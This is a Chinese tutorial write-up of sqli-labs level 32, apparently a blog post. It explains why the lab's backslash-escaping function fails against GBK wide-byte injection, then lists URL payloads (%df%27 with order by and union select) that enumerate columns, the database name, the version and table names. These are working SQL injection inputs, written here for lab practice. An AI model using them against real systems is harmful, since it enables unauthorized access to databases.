sqli-第三十二关——bypass addslashes

一:宽字节注入

先查看源码

观察转义函数 check_addslashes()里面的三行表达式

第一行

复制代码
 $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);  

part1: '/'. preg_quote('\\') .'/'

转义了反斜杠:假设我们输入a\b

先在preg_quote进行第一层转义,将 \ 转义为两个反斜杠,输出 /\\/

然后再替换字符串 \\\\\\,实际表示出三个反斜杠,因为第一\是php解析层,解析完变成 \\\\,第二圈是正则表达式解析层,所以实际表示三个反斜杠

所以会输出a\\\b;

作用:把字符串所有的 \ 替换成 \\

第二行

复制代码
$string = preg_replace('/\'/i', '\\\'', $string);

作用:把所有的 ' 替换成 \'

第三行

复制代码
$string = preg_replace('/\"/', "\\\"", $string);

作用:把所有的 " 替换成 \"

反斜杠( \ )在编程中是转义字符,可以让后面的特殊字符失去其特殊意义

例如,\' 表示 " 这是一个普通的单引号,不是SQL语句的结束符 "

宽字节的格式是在地址后面加一个%df,再加单引号,

因为反斜杠的编码是%5c,连起来%df&5c对应GBK编码中的 ' 運 ' 字,也就是说,数据库实际看到的是

复制代码
SELECT * FROM users WHERE id='運' OR 1=1 --'

这样单引号就成功逃逸出来了,也就是说 or 1=1的恶意代码执行了

二:判断闭合类型

输入?id=1',可以通过提示发现被转义了

我们尝试宽字节注入 ,成功报错

复制代码
?id=1%df%27

--+尝试闭合

​编辑 文章

闭合成功

三:开始注入:

1.爆列数

复制代码
?id=1%df%27%20order%20by%201,2,3,4--+

2.爆回显位

复制代码
?id=-1%df%27%20union%20select%201,2,3--+

3.爆库名和版本号

复制代码
?id=-1%df%27%20union%20select%201,database(),version()--+

4.联合查询爆表名,行数:

复制代码
?id=-1%df%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+

❀❀❀ 完结撒花!!!❀❀❀

相关推荐
Java 码农11 分钟前
nodejs koa留言板案例开发
前端·javascript·npm·node.js
做科研的周师兄27 分钟前
【机器学习入门】1.2 初识机器学习:从数据到智能的认知之旅
大数据·数据库·人工智能·python·机器学习·数据分析·机器人
政安晨30 分钟前
Ubuntu 服务器无法 ping 通网站域名的问题解决备忘 ——通常与网络配置有关(DNS解析)
linux·运维·服务器·ubuntu·ping·esp32编译服务器·dns域名解析
ZhuAiQuan34 分钟前
[electron]开发环境驱动识别失败
前端·javascript·electron
nyf_unknown39 分钟前
(vue)将dify和ragflow页面嵌入到vue3项目
前端·javascript·vue.js
胡gh1 小时前
浏览器:我要用缓存!服务器:你缓存过期了!怎么把数据挽留住,这是个问题。
前端·面试·node.js
qq_364371721 小时前
基于 Redis + JWT 的跨系统身份共享方案
数据库·redis
你挚爱的强哥1 小时前
SCSS上传图片占位区域样式
前端·css·scss
奶球不是球1 小时前
css新特性
前端·css
Nicholas681 小时前
flutter滚动视图之Viewport、RenderViewport源码解析(六)
前端